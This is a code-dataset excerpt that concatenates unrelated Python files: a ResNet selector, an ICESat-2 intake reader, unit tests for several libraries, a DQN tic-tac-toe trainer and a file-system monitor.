'epsilon': batch_norm_epsilon,
'scale': batch_norm_scale,
'trainable': False,
'updates_collections': tf.GraphKeys.UPDATE_OPS
}
with arg_scope(
[slim.conv2d],
weights_regularizer=slim.l2_regularizer(cfg.TRAIN.WEIGHT_DECAY),
weights_initializer=slim.variance_scaling_initializer(),
trainable=is_training,
activation_fn=tf.nn.relu,
normalizer_fn=slim.batch_norm,
normalizer_params=batch_norm_params):
with arg_scope([slim.batch_norm], **batch_norm_params) as arg_sc:
return arg_sc
class selector(object):
def __init__(self, mode):
# Network.__init__(self)
self.training = mode == 'TRAIN'
self.testing = mode == 'TEST'
self._scope = 'selector'
self._decide_blocks()
# H = W = 300
self._image = tf.placeholder(tf.float32, shape=[1, None, None, 3])
# Do the first few layers manually, because 'SAME' padding can behave inconsistently
# for images of different sizes: sometimes 0, sometimes 1
def _build_base(self):
with tf.variable_scope(self._scope, self._scope):
net = resnet_utils.conv2d_same(self._image, 64, 7, stride=2, scope='conv1')
net = tf.pad(net, [[0, 0], [1, 1], [1, 1], [0, 0]])
net = slim.max_pool2d(net, [3, 3], stride=2, padding='VALID', scope='pool1')
return net
def select(self, num_select, reuse=None):
assert (0 <= cfg.RESNET.FIXED_BLOCKS <= 3)
# Now the base is always fixed during training
with slim.arg_scope(resnet_arg_scope(is_training=False)):
net_conv = self._build_base()
if cfg.RESNET.FIXED_BLOCKS > 0:
with slim.arg_scope(resnet_arg_scope(is_training=False)):
net_conv, _ = resnet_v1.resnet_v1(net_conv,
self._blocks[0:cfg.RESNET.FIXED_BLOCKS],
global_pool=False,
include_root_block=False,
reuse=reuse,
scope=self._scope)
if cfg.RESNET.FIXED_BLOCKS < 3:
with slim.arg_scope(resnet_arg_scope(is_training=self.training)):
net_conv, _ = resnet_v1.resnet_v1(net_conv,
self._blocks[cfg.RESNET.FIXED_BLOCKS:-1],
global_pool=False,
include_root_block=False,
reuse=reuse,
scope=self._scope)
net_conv = slim.conv2d(net_conv, num_outputs=128, kernel_size=[1, 1], padding="SAME", scope="c1_s1")
net_conv = slim.conv2d(net_conv, num_outputs=num_select, kernel_size=[1, 1], padding="SAME", activation_fn=None, scope="c1_s2")
# Selection; Find the selector index
idx = tf.argmax(tf.nn.softmax(net_conv, -1), -1)
return idx
def _decide_blocks(self):
# choose different blocks for different number of layers
self._blocks = [resnet_v1_block('block1', base_depth=16, num_units=3, stride=2),
resnet_v1_block('block2', base_depth=32, num_units=4, stride=2),
# use stride 1 for the last conv4 layer
resnet_v1_block('block3', base_depth=64, num_units=6, stride=1),
resnet_v1_block('block4', base_depth=128, num_units=3, stride=1)]
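def _selector_usage_sketch():
    """Hedged usage sketch (added): build the selection graph and run it on a dummy image.

    The image size and num_select value are illustrative only; this assumes a TF1-style session.
    """
    sel = selector('TRAIN')
    idx_op = sel.select(num_select=4)                  # per-pixel argmax over 4 selection channels
    with tf.Session() as sess:
        sess.run(tf.global_variables_initializer())
        dummy_image = np.zeros((1, 300, 300, 3), dtype=np.float32)
        return sess.run(idx_op, feed_dict={sel._image: dummy_image}).shape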
| StarcoderdataPython |
3389698 | <reponame>bessoh2/integration_station
import fnmatch
from intake.catalog import Catalog
import os
import xarray as xr
"""
IMPORTANT NOTES
This code is currently UNDER DEVELOPMENT for the icepyx (https://github.com/icesat2py/icepyx) library for working with ICESat-2 data.
This version of the code is static and will only be manipulated as needed for the July 2021 SnowEx Hackweek project.
Ultimately, this functionality will be improved, tested, and included as a standard part of the icepyx package.
You're encouraged to use that version in any workflows for tracibility and reproducibility, as this version will not be maintained.
Please contact Jessica (@JessicaS11) for more info or with any questions.
"""
def _get_datasource_type(): # filepath):
"""
Determine if the input is from a local system or is an s3 bucket
Not needed now, but will need to use for cloud data access
"""
source_types = ["is2_local", "is2_s3"]
return source_types[0]
def _validate_source(source):
"""
Check that the entered data source paths are valid
"""
# acceptable inputs (for now) are a single file or directory
assert type(source) == str, "You must enter your input as a string."
assert (
os.path.isdir(source) == True or os.path.isfile(source) == True
), "Your data source string is not a valid data source."
return True
def _pattern_to_glob(pattern):
"""
Adapted from intake.source.utils.path_to_glob to convert a path as pattern into a glob style path
that uses the pattern's indicated number of '?' instead of '*' where an int was specified.
Returns pattern if pattern is not a string.
Parameters
----------
pattern : str
Path as pattern optionally containing format_strings
Returns
-------
glob : str
Path with int format strings replaced with the proper number of '?' and '*' otherwise.
Examples
--------
>>> _pattern_to_glob('{year}/{month}/{day}.csv')
'*/*/*.csv'
>>> _pattern_to_glob('{year:4}/{month:2}/{day:2}.csv')
'????/??/??.csv'
>>> _pattern_to_glob('data/{year:4}{month:02}{day:02}.csv')
'data/????????.csv'
>>> _pattern_to_glob('data/*.csv')
'data/*.csv'
"""
from string import Formatter
if not isinstance(pattern, str):
return pattern
fmt = Formatter()
glob = ""
prev_field_name = None
for literal_text, field_name, format_specs, _ in fmt.parse(pattern):
glob += literal_text
if field_name and (glob[-1] != "*"):
try:
glob += "?" * int(format_specs)
except ValueError:
glob += "*"
# alternatively, you could use bits=utils._get_parts_of_format_string(resolved_string, literal_texts, format_specs)
# and then use len(bits[i]) to get the length of each format_spec
# print(glob)
return glob
def _run_fast_scandir(dir, fn_glob):
"""
Quickly scan nested directories to get a list of filenames that match the fn_glob string.
Modified from https://stackoverflow.com/a/59803793/2441026
(faster than os.walk or glob methods, and allows filename matching in subdirectories).
Parameters
----------
dir : str
full path to the input directory
fn_glob : str
glob-style filename pattern
Outputs
-------
subfolders : list
list of strings of all nested subdirectories
files : list
list of strings containing full paths to each file matching the filename pattern
"""
subfolders, files = [], []
for f in os.scandir(dir):
if f.is_dir():
subfolders.append(f.path)
if f.is_file():
if fnmatch.fnmatch(f.name, fn_glob):
files.append(f.path)
for dir in list(subfolders):
sf, f = _run_fast_scandir(dir, fn_glob)
subfolders.extend(sf)
files.extend(f)
return subfolders, files
def _check_source_for_pattern(source, filename_pattern):
"""
Check that the entered data source contains files that match the input filename_pattern
"""
glob_pattern = _pattern_to_glob(filename_pattern)
if os.path.isdir(source):
_, filelist = _run_fast_scandir(source, glob_pattern)
assert len(filelist) > 0, "None of your filenames match the specified pattern."
print(
f"You have {len(filelist)} files matching the filename pattern to be read in."
)
return True
elif os.path.isfile(source):
assert fnmatch.fnmatch(
os.path.basename(source), glob_pattern
), "Your input filename does not match the filename pattern."
return True
else:
return False
class Read:
"""
Data object to create and use Intake catalogs to read ICESat-2 data into the specified formats.
    Provides flexibility for reading nested hdf5 files into common analysis formats.
Parameters
----------
data_source : string
A string with a full file path or full directory path to ICESat-2 hdf5 (.h5) format files.
Files within a directory must have a consistent filename pattern.
filename_pattern : string, default 'ATL{product:2}_{datetime:%Y%m%d%H%M%S}_{rgt:4}{cycle:2}{orbitsegment:2}_{version:3}_{revision:2}.h5'
String that shows the filename pattern as required for Intake's path_as_pattern argument.
The default describes files downloaded directly from NSIDC (subsetted and non-subsetted).
catalog : string, default None
Full path to an Intake catalog for reading in data.
If you still need to create a catalog, leave as default.
out_obj_type : object, default xarray.Dataset
The desired format for the data to be read in.
Currently, only xarray.Dataset objects (default) are available.
Please ask us how to help enable usage of other data objects!
Returns
-------
read object
Examples
--------
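    A hedged sketch only: the data path below is hypothetical, so the calls are marked to be skipped.

    >>> reader = Read(data_source='/tmp/ATL06_data')  # doctest: +SKIP
    >>> reader.build_catalog(var_paths='/gt1l/land_ice_segments')  # doctest: +SKIP
    >>> print(reader.catalog)  # doctest: +SKIP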
"""
# ----------------------------------------------------------------------
# Constructors
def __init__(
self,
data_source=None,
filename_pattern="ATL{product:2}_{datetime:%Y%m%d%H%M%S}_{rgt:4}{cycle:2}{orbitsegment:2}_{version:3}_{revision:2}.h5",
catalog=None,
out_obj_type=None, # xr.Dataset,
):
if data_source == None:
raise ValueError("Please provide a data source.")
else:
assert _validate_source(data_source)
self.data_source = data_source
assert _check_source_for_pattern(data_source, filename_pattern)
# Note: need to check if this works for subset and non-subset NSIDC files (processed_ prepends the former)
self._pattern = filename_pattern
# after validation, use the notebook code and code outline to start implementing the rest of the class
if catalog:
print("validate catalog")
self._catalog_path = catalog
if out_obj_type:
print(
"Output object type will be an xarray DataSet - no other output types are implemented"
)
self._out_obj = xr.Dataset
self._source_type = _get_datasource_type()
# ----------------------------------------------------------------------
# Properties
@property
def catalog(self):
"""
Print the catalog.
Examples
--------
>>>
"""
if not hasattr(self, "_catalog"):
return open(self._catalog_path, "r").read()
else:
return self._catalog
# ----------------------------------------------------------------------
# Methods
def build_catalog(self, var_paths="/gt1l/land_ice_segments", **kwargs):
""""""
from intake.catalog.local import LocalCatalogEntry
import intake_xarray
import icepyx.core.APIformatting as apifmt
xarray_kwargs_dict = {"engine": "h5netcdf", "group": var_paths}
source_args_dict = {
"urlpath": self.data_source,
"path_as_pattern": self._pattern,
"xarray_kwargs": xarray_kwargs_dict,
}
metadata_dict = {"version": 1}
source_dict = {
"name": self._source_type,
"description": "",
"driver": intake_xarray.netcdf.NetCDFSource,
"args": source_args_dict,
}
local_cat_source = {self._source_type: LocalCatalogEntry(**source_dict)}
defaults_dict = {
"name": "IS2-hdf5-icepyx-intake-catalog",
"description": "an icepyx-generated catalog for creating local ICESat-2 intake entries",
"metadata": metadata_dict,
"entries": local_cat_source,
}
build_cat_dict = apifmt.combine_params(defaults_dict, kwargs)
        self._catalog = Catalog.from_dict(**build_cat_dict)
| StarcoderdataPython |
127949 | '''
__iter__
    If a class is to be used in a for ... in loop, like a list or tuple, it must implement an __iter__() method.
__getitem__
    Lets an instance be indexed like a list to retrieve elements.
'''
class demo02:
def __init__(self):
        self.a, self.b = 0, 1  # initialize two counters, a and b
def __iter__(self):
        return self  # the instance itself is the iterator, so return self
def __next__(self):
        if self.b:                   # first call: yield the initial value 0
            self.b = 0
        else:
            self.a = self.a + 2      # later calls: advance to the next even number
        if self.a > 100:
            raise StopIteration()
        return self.a
def __getitem__(self, item):
list1 = range(0,101,2)
return list1[item]
for x in demo02():
print(x)
print(demo02()[3])
| StarcoderdataPython |
166267 | import os
import unittest
from dotenv import dotenv_values
from skyflow.service_account._token import *
from skyflow.service_account import is_expired
class TestGenerateBearerToken(unittest.TestCase):
def setUp(self) -> None:
self.dataPath = os.path.join(
os.getcwd(), 'tests/service_account/data/')
return super().setUp()
def testIsExpiredInvalidToken(self):
try:
token = 'invalid token'
self.assertEqual(True, is_expired(token))
except SkyflowError as se:
self.fail('raised exception for invalid token')
def testIsExpiredEmptyToken(self):
try:
self.assertEqual(True, is_expired(''))
except SkyflowError as se:
self.fail('Error '+str(se.message))
def testIsExpiredTokenExpred(self):
expiredToken = '<KEY>'
try:
self.assertEqual(True, is_expired(expiredToken))
except SkyflowError:
self.fail('raised error for expired token')
| StarcoderdataPython |
3336664 |
from transformers import pipeline
unmasker = pipeline('fill-mask', model='bert-base-uncased')
unmasker("Hello I'm a [MASK] model.")
[{'sequence': "[CLS] hello i'm a fashion model. [SEP]",
'score': 0.1073106899857521,
'token': 4827,
'token_str': 'fashion'},
{'sequence': "[CLS] hello i'm a role model. [SEP]",
'score': 0.08774490654468536,
'token': 2535,
'token_str': 'role'},
{'sequence': "[CLS] hello i'm a new model. [SEP]",
'score': 0.05338378623127937,
'token': 2047,
'token_str': 'new'},
{'sequence': "[CLS] hello i'm a super model. [SEP]",
'score': 0.04667217284440994,
'token': 3565,
'token_str': 'super'},
{'sequence': "[CLS] hello i'm a fine model. [SEP]",
'score': 0.027095865458250046,
'token': 2986,
'token_str': 'fine'}]
| StarcoderdataPython |
73752 | import pytest
from click.testing import CliRunner
import dodola.cli
import dodola.services
@pytest.mark.parametrize(
"subcmd",
[
None,
"biascorrect",
"buildweights",
"rechunk",
"regrid",
"train-qdm",
"apply-qdm",
"correct-wetday-frequency",
"train-aiqpd",
"apply-aiqpd",
],
ids=(
"--help",
"biascorrect --help",
"buildweights --help",
"rechunk --help",
"regrid --help",
"train-qdm --help",
"apply-qdm --help",
"correct-wetday-frequency --help",
"train-aiqpd --help",
"apply-aiqpd --help",
),
)
def test_cli_helpflags(subcmd):
"""Test that CLI commands and subcommands don't throw Error if given --help flag"""
runner = CliRunner()
# Setup CLI args
cli_args = ["--help"]
if subcmd is not None:
cli_args = [subcmd, "--help"]
result = runner.invoke(dodola.cli.dodola_cli, cli_args)
assert "Error:" not in result.output
| StarcoderdataPython |
3207915 | # Copyright 2019 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
from oslotest import base
from sushy_tools.emulator.resources import managers
from sushy_tools import error
class FakeDriverTestCase(base.BaseTestCase):
def setUp(self):
super(FakeDriverTestCase, self).setUp()
self.identity = 'xxx'
self.systems = mock.Mock(systems=[self.identity])
self.systems.uuid.return_value = 'xxx'
self.systems.name.return_value = 'name'
self.manager = {'UUID': self.identity,
'Id': self.identity,
'Name': 'name-Manager'}
self.chassis = mock.Mock(chassis=[])
self.test_driver = managers.FakeDriver({}, mock.Mock(),
self.systems, self.chassis)
def test_get_manager_not_found(self):
self.systems.uuid.side_effect = error.FishyError('boom')
self.assertRaises(
error.FishyError, self.test_driver.get_manager, 'foo')
def test_get_manager_by_uuid(self):
manager = self.test_driver.get_manager('xxx')
self.assertEqual(self.manager, manager)
def test_managers(self):
result = self.test_driver.managers
self.assertEqual([self.identity], result)
def test_managed_systems(self):
self.assertEqual(
['xxx'], self.test_driver.get_managed_systems(self.manager))
| StarcoderdataPython |
1639483 | from django.urls import path
from .views import upload_file_view
urlpatterns = [
path("", upload_file_view, name="upload-view"),
]
| StarcoderdataPython |
3365268 | <reponame>TobiasBrx/AlphaToe
"""
It is important to note that if the second player is randomized without knowing the rules,
their performance is so bad that the DQN algorithm simply learns how to play legal moves
and waits until the random opponent makes an illegal move which causes the DQN agent to win.
It is extremely unlikely that a randomized opponent wins or even draws under these circumstances.
We achieve a win rate of >99% for the DQN agent against such a randomized opponent, with around 0.2%
of games won by the randomized opponent and 0.4% ending in a draw.
"""
"""
On the other hand when we allow the randomized opponent to know the rules of the game we can
witness a beautiful learning curve of the DQN agent from not knowing the rules to
fully understanding the game and playing on a high (optimal?) level.
Starting from <5% winning games in the first 1000 games, it reaches about 50% after 50000 games (which corresponds
to playing as well as a randomized opponent who knows the rules, and can thus be interpreted as
having learned the rules).
After about 100000 episodes the DQN agent dominates the random opponent with about an 80% winning chance,
but it does not find the Nash equilibrium strategy of never losing a game. Training from then on
raises performance to about a 98% winning rate, but again the remaining games
are lost rather than drawn.
It is also interesting to note that the agent prioritizes preventing the opponent from winning over
winning itself. If it is its turn and it could win in one move, it prefers to stop the opponent from winning
in one move and play on.
"""
############################### Imports ##################################
import collections
import os
import random
import numpy as np
import tensorflow as tf
from common.network_helpers import load_network, save_network
###############################################################################
def get_td_network_move(session, input_layer, output_layer, board_state, side, eps=0.1,
valid_only=False, game_spec=None, ):
"""Choose a move for the given board_state using a stocastic policy. A move is selected using epsilon greedy
strategy of the values from the output_layer. With epsilon probability a random move is chosen and with
1-epsilon probability the move with the highest Q-value is chosen.
Args:
session (tf.Session): Session used to run this network
input_layer (tf.Placeholder): Placeholder to the network used to feed in the board_state
        output_layer (tf.Tensor): Tensor that will output the Q-values of the moves, expected to be of
            dimensions (None, board_squares).
board_state: The board_state we want to get the move for.
side: The side that is making the move.
Returns:
        (np.array) Its shape is (board_squares), and it is a one-hot encoding of the move the network has chosen.
"""
np_board_state = np.array(board_state)
if side == -1:
np_board_state = -np_board_state
np_board_state = np_board_state.reshape(1, *input_layer.get_shape().as_list()[1:])
Q_values_of_actions = session.run(output_layer,
feed_dict={input_layer: np_board_state})[0]
if valid_only:
available_moves = list(game_spec.available_moves(board_state))
if len(available_moves) == 1:
move = np.zeros(game_spec.board_squares())
np.put(move, game_spec.tuple_move_to_flat(available_moves[0]), 1)
return move
available_moves_flat = [game_spec.tuple_move_to_flat(x) for x in available_moves]
if np.random.rand() < eps:
pick = random.choice(available_moves_flat)
move = np.zeros(game_spec.board_squares())
np.put(move, pick, 1)
return move
for i in range(game_spec.board_squares()):
if i not in available_moves_flat:
Q_values_of_actions[i] = - np.inf
pick = np.argmax(Q_values_of_actions)
best_move = np.zeros(game_spec.board_squares())
np.put(best_move, pick, 1)
return best_move
else:
if np.random.rand() < eps:
pick = random.choice(np.arange(9))
move = np.zeros(game_spec.board_squares())
np.put(move, pick, 1)
return move
else:
pick = np.argmax(Q_values_of_actions)
best_move = np.zeros(game_spec.board_squares())
np.put(best_move, pick, 1)
return best_move
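
###############################################################################
# Hedged illustration, not part of the original AlphaToe code: the same masked
# epsilon-greedy selection as above, written as a standalone NumPy helper on
# made-up inputs. `q_values` is a flat vector of Q-values and
# `available_moves_flat` the list of legal flat move indices.
def _epsilon_greedy_example(q_values, available_moves_flat, eps=0.1):
    """Return a one-hot move: a random legal move with probability eps, otherwise the legal argmax."""
    masked_q = np.full(len(q_values), -np.inf)
    masked_q[available_moves_flat] = np.asarray(q_values)[available_moves_flat]
    if np.random.rand() < eps:
        pick = random.choice(available_moves_flat)
    else:
        pick = int(np.argmax(masked_q))
    move = np.zeros(len(q_values))
    np.put(move, pick, 1)
    return move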
###############################################################################
log_ = False # just for logging purposes
def DQN_train(game_spec,
create_network, # this should have scope principal
create_network_2,
              create_target_network, # this should have scope "target"
create_target_network_2,
network_file_path,
save_network_file_path=None,
opponent_func=None,
number_of_games=10000,
print_results_every=1000,
learn_rate=1e-4,
batch_size=100,
randomize_first_player=True):
"""Train a network using the DQN algorithm with replay buffer, a principal and a target network
Args:
        save_network_file_path (str): Optionally specify a path to use for saving the network; if unset then
the network_file_path param is used.
opponent_func (board_state, side) -> move: Function for the opponent, if unset we use an opponent playing
randomly
randomize_first_player (bool): If True we alternate between being the first and second player
game_spec (games.base_game_spec.BaseGameSpec): The game we are playing
create_network (->(input_layer : tf.placeholder, output_layer : tf.placeholder, variables : [tf.Variable])):
Method that creates the network we will train.
network_file_path (str): path to the file with weights we want to load for this network
number_of_games (int): number of games to play before stopping
print_results_every (int): Prints results to std out every x games, also saves the network
learn_rate (float):
batch_size (int):
Returns:
(variables used in the final network : list, win rate: float)
"""
p1wins = np.array([])
p2wins = np.array([])
drawsarr = np.array([])
input_layer, output_layer, variables = create_network()
input_layer_2, output_layer_2, variables_2 = create_network_2()
input_layer_t, output_layer_t, variables_t = create_target_network()
input_layer_t2, output_layer_t2, variables_t2 = create_target_network_2()
target_1 = tf.placeholder("float", shape=(None))
#target_2 = tf.placeholder("float", shape=(None))
actual_move_placeholder = tf.placeholder("float", shape=(None, game_spec.outputs()))
#actual_move_placeholder_2 = tf.placeholder("float", shape=(None, game_spec.outputs()))
prediction = tf.reduce_sum(actual_move_placeholder*output_layer, axis=1)
#prediction_2 = tf.reduce_sum(actual_move_placeholder_2*output_layer_2, axis=1)
td_gradient_1 = tf.reduce_mean(tf.square(prediction - target_1))
#td_gradient_2 = tf.reduce_mean(tf.square(prediction_2 - target_2))
train_step = tf.train.AdamOptimizer(learn_rate).minimize(td_gradient_1)
#train_step_2 = tf.train.AdamOptimizer(learn_rate).minimize(td_gradient_2)
gamma = 0.99
tau = 100
###############################################################################
#To copy the principal to the target network
def build_target_update(from_scope, to_scope):
from_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=from_scope)
to_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=to_scope)
op = []
for v1, v2 in zip(from_vars, to_vars):
op.append(v2.assign(v1))
return op
update = build_target_update("principal", "target")
###############################################################################
with tf.Session() as session:
session.run(tf.global_variables_initializer())
if network_file_path and os.path.isfile(network_file_path):
print(f"Loading pre-existing network from {network_file_path}")
load_network(session, variables, network_file_path)
mini_batch_board_states, mini_batch_moves, mini_batch_rewards = [], [], []
mini_batch_board_states_2, mini_batch_moves_2, mini_batch_rewards_2 = [], [], []
mini_batch_board_states_temp, mini_batch_next_board_states = [], []
mini_batch_board_states_temp_2, mini_batch_next_board_states_2 = [], []
results = collections.deque(maxlen=print_results_every)
results_2 = collections.deque(maxlen=print_results_every)
###############################################################################
def make_training_move(board_state, side, eps):
mini_batch_board_states.append(np.ravel(board_state) * side)
#epsilon greedy choice of the next move
move = get_td_network_move(session, input_layer, output_layer, board_state,
side, eps, valid_only=False, game_spec=game_spec) # valid_only=True, game_spec=game_spec
mini_batch_moves.append(move)
return game_spec.flat_move_to_tuple(move.argmax())
###############################################################################
#It has the option of letting the user play the game when log_ is set to
# "Interactive"
def make_training_move_2(board_state, side, eps):
"""
            To have the second player play randomly, set the eps argument of the get_td_network_move() call below to eps=1.
            To have the second player play epsilon-greedily, pass through the eps received by
            make_training_move_2(..., eps) instead.
"""
global log_
mini_batch_board_states_2.append(np.ravel(board_state) * side)
if log_ == "Interactive":
pick = np.int(input("Enter Move (0-9): "))
move = np.zeros(game_spec.board_squares())
np.put(move, pick, 1)
mini_batch_moves_2.append(move)
return game_spec.flat_move_to_tuple((move.argmax()))
#epsilon greedy choice of the next move
else: move = get_td_network_move(session, input_layer_2, output_layer_2, board_state,
side, eps=1, valid_only=True, game_spec=game_spec) # valid_only=True
mini_batch_moves_2.append(move)
return game_spec.flat_move_to_tuple(move.argmax())
############################### Training ##################################
for episode_number in range(1, number_of_games):
global log_
log_ = False
if episode_number % 20000 == 0:
log_=True
# change log_ to log_ = "Interactive" to play against the current network
eps = np.exp(-10*episode_number/number_of_games) #5000/episode_number # np.exp(-5*episode_number/200000)
if (not randomize_first_player) or bool(random.getrandbits(1)):
if log_:
print("Player 1 starts with symbol 1. Player 2 follows with symbol -1")
reward = game_spec.play_game_eps(make_training_move, make_training_move_2, eps, log = log_)
reward_2 = - reward
else:
if log_:
print("Player 2 starts with symbol 1. Player 1 follows with symbol -1")
reward = -game_spec.play_game_eps(make_training_move_2, make_training_move, eps, log = log_)
reward_2 = - reward
results.append(reward)
results_2.append(reward_2)
            # we scale here so winning quickly is better than winning slowly, and losing slowly is better than losing quickly
last_game_length = len(mini_batch_board_states) - len(mini_batch_rewards)
last_game_length_2 = len(mini_batch_board_states_2) - len(mini_batch_rewards_2)
reward /= float(last_game_length)
reward_2 /= float(last_game_length_2)
mini_batch_rewards += ([reward] * (last_game_length))# remember that this applies a reward to the whole game!!
#mini_batch_rewards += [0]*(last_game_length-1)+[reward]
            mini_batch_rewards_2 += ([reward_2] * last_game_length_2) # Changes learning dynamics. No sparse-reward environment anymore.
#mini_batch_rewards_2 += [0]*(last_game_length_2-1)+[reward_2]
length = len(mini_batch_board_states_temp)
mini_batch_board_states_temp = np.copy(mini_batch_board_states)
new_moves = mini_batch_board_states[length:]
mini_batch_next_board_states += (new_moves[1:]+[np.array([0,0,0,0,0,0,0,0,0])])
length_2 = len(mini_batch_board_states_temp_2)
mini_batch_board_states_temp_2 = np.copy(mini_batch_board_states_2)
new_moves_2 = mini_batch_board_states_2[length_2:]
mini_batch_next_board_states_2 += (new_moves_2[1:]+[np.array([0,0,0,0,0,0,0,0,0])])
if episode_number % batch_size == 0:
normalized_rewards = mini_batch_rewards - np.mean(mini_batch_rewards)
normalized_rewards_2 = mini_batch_rewards_2 - np.mean(mini_batch_rewards_2)
rewards_std = np.std(normalized_rewards)
rewards_std_2 = np.std(normalized_rewards_2)
if rewards_std != 0:
normalized_rewards /= rewards_std
else:
print("warning: got mini batch std of 0.")
if rewards_std_2 != 0:
normalized_rewards_2 /= rewards_std_2
else:
print("warning: got mini batch 2 std of 0.")
np_mini_batch_board_states = np.array(mini_batch_board_states) \
.reshape(len(mini_batch_rewards), *input_layer.get_shape().as_list()[1:])
#np_mini_batch_board_states_2 = np.array(mini_batch_board_states_2) \
# .reshape(len(mini_batch_rewards_2), *input_layer_2.get_shape().as_list()[1:])
np_mini_batch_next_board_states = np.array(mini_batch_next_board_states) \
.reshape(len(mini_batch_rewards), *input_layer.get_shape().as_list()[1:])
#np_mini_batch_next_board_states_2 = np.array(mini_batch_next_board_states_2) \
# .reshape(len(mini_batch_rewards_2), *input_layer_2.get_shape().as_list()[1:])
Q_targets = np.max(session.run(output_layer_t,
feed_dict={input_layer_t: np_mini_batch_next_board_states}), axis=1)
done = [0 if all([x == 0 for x in i]) else 1 for i in np_mini_batch_next_board_states]
targets_ = mini_batch_rewards + gamma*Q_targets*done
session.run(train_step, feed_dict={input_layer: np_mini_batch_board_states, \
actual_move_placeholder: mini_batch_moves, target_1: targets_})
if (episode_number%tau == 0):
session.run(update)
###############################################################################
# clear batches
del mini_batch_board_states[:]
del mini_batch_moves[:]
del mini_batch_rewards[:]
del mini_batch_board_states_2[:]
del mini_batch_moves_2[:]
del mini_batch_rewards_2[:]
mini_batch_next_board_states = []
mini_batch_next_board_states_2 = []
length, length_2 = 0, 0
mini_batch_board_states_temp = []
mini_batch_board_states_temp_2 = []
new_moves = []
new_moves_2 = []
############################### Results ##################################
if episode_number % print_results_every == 0:
draws = sum([x == 0 for x in results])
print(" Player 1: episode: %s win_rate: %s" % (episode_number, _win_rate_strict(print_results_every, results)))
print(" Player 2: episode: %s win_rate: %s" % (episode_number, _win_rate_strict(print_results_every, results_2)))
print(f'Proportion of Draws: = {draws/print_results_every}')
p1wins = np.append(p1wins, _win_rate_strict(print_results_every, results))
p2wins = np.append(p2wins, _win_rate_strict(print_results_every, results_2))
drawsarr = np.append(drawsarr, draws/print_results_every)
#################### ANALYSIS & LOGGING ###################################
if episode_number % 50000 == 0:
Q = session.run(output_layer_t,
feed_dict={input_layer_t: np.expand_dims([0,1,-1,-1,1,0,0,0,0],0)})
print(f'Q-values: {Q}')
Q = session.run(output_layer_t,
feed_dict={input_layer_t: np.expand_dims([0,1,1,-1,-1,0,0,0,0],0)})
print(f'Q-values: {Q}')
Q = session.run(output_layer_t,
feed_dict={input_layer_t: np.expand_dims([-1,-1,0,0,-1,1,1,1,0],0)})
print(f'Q-values: {Q}')
###############################################################################
if save_network_file_path:
print(f"Saving Network at {save_network_file_path}")
save_network(session, variables, save_network_file_path)
#return variables, _win_rate(print_results_every, results)
return p1wins, p2wins, drawsarr
###############################################################################
def _win_rate(print_results_every, results):
return 0.5 + sum(results) / (print_results_every * 2.)
def _win_rate_strict(print_results_every, results):
wins = sum([x == 1 for x in results])
return wins / (print_results_every)
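
###############################################################################
# Hedged illustration, not part of the original code: the Bellman target computed
# inside DQN_train, written out on plain NumPy arrays. `done_mask` is 0 for
# terminal next-states (all-zero boards) and 1 otherwise, matching the `done`
# list built in the training loop above. All inputs here are example data.
def _bellman_target_example(rewards, max_next_q, done_mask, gamma=0.99):
    rewards = np.asarray(rewards, dtype=float)
    return rewards + gamma * np.asarray(max_next_q) * np.asarray(done_mask)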
| StarcoderdataPython |
23226 | # Copyright (c) 2012 <NAME> <<EMAIL>>
#
# This is free software released under the MIT license.
# See COPYING file for details, or visit:
# http://www.opensource.org/licenses/mit-license.php
#
# The file is part of FSMonitor, a file-system monitoring library.
# https://github.com/shaurz/fsmonitor
import sys, os, time, threading, errno
from .common import FSEvent, FSMonitorError
def get_dir_contents(path):
return [(filename, os.stat(os.path.join(path, filename)))
for filename in os.listdir(path)]
class FSMonitorDirWatch(object):
def __init__(self, path, flags, user):
self.path = path
self.flags = flags
self.user = user
self.enabled = True
self._timestamp = time.time()
try:
self._contents = get_dir_contents(path)
self._deleted = False
except OSError as e:
self._contents = []
self._deleted = (e.errno == errno.ENOENT)
def __repr__(self):
return "<FSMonitorDirWatch %r>" % self.path
@classmethod
def new_state(cls, path):
return [(filename, os.stat(os.path.join(path, filename)))
for filename in os.listdir(path)]
def getstate(self):
return self._contents
def delstate(self):
self._contents = []
self._deleted = True
def setstate(self, state):
self._contents = state
self._deleted = False
state = property(getstate, setstate, delstate)
class FSMonitorFileWatch(object):
def __init__(self, path, flags, user):
self.path = path
self.flags = flags
self.user = user
self.enabled = True
self._timestamp = time.time()
try:
self._stat = os.stat(path)
self._deleted = False
except OSError as e:
self._stat = None
self._deleted = (e.errno == errno.ENOENT)
def __repr__(self):
return "<FSMonitorFileWatch %r>" % self.path
@classmethod
def new_state(cls, path):
return os.stat(path)
def getstate(self):
return self._stat
def delstate(self):
self._stat = None
self._deleted = True
def setstate(self, state):
self._stat = state
self._deleted = False
state = property(getstate, setstate, delstate)
class FSMonitorWatch(object):
def __init__(self, path, flags, user):
self.path = path
self.flags = flags
self.user = user
self.enabled = True
self._timestamp = time.time()
try:
self._contents = get_dir_contents(path)
self._deleted = False
except OSError as e:
self._contents = []
self._deleted = (e.errno == errno.ENOENT)
def __repr__(self):
return "<FSMonitorWatch %r>" % self.path
def _compare_contents(watch, new_contents, events_out, before):
name_to_new_stat = dict(new_contents)
for name, old_stat in watch._contents:
new_stat = name_to_new_stat.get(name)
if new_stat:
_compare_stat(watch, new_stat, events_out, before, old_stat, name)
else:
events_out.append(FSEvent(watch, FSEvent.Delete, name))
old_names = frozenset(x[0] for x in watch._contents)
for name, new_stat in new_contents:
if name not in old_names:
events_out.append(FSEvent(watch, FSEvent.Create, name))
def _compare_stat(watch, new_stat, events_out, before, old_stat, filename):
if new_stat.st_atime != old_stat.st_atime and new_stat.st_atime < before:
events_out.append(FSEvent(watch, FSEvent.Access, filename))
if new_stat.st_mtime != old_stat.st_mtime:
events_out.append(FSEvent(watch, FSEvent.Modify, filename))
def round_fs_resolution(t):
if sys.platform == "win32":
return t // 2 * 2
else:
return t // 1
class FSMonitor(object):
def __init__(self):
self.__lock = threading.Lock()
self.__dir_watches = set()
self.__file_watches = set()
self.polling_interval = 0.5
@property
def watches(self):
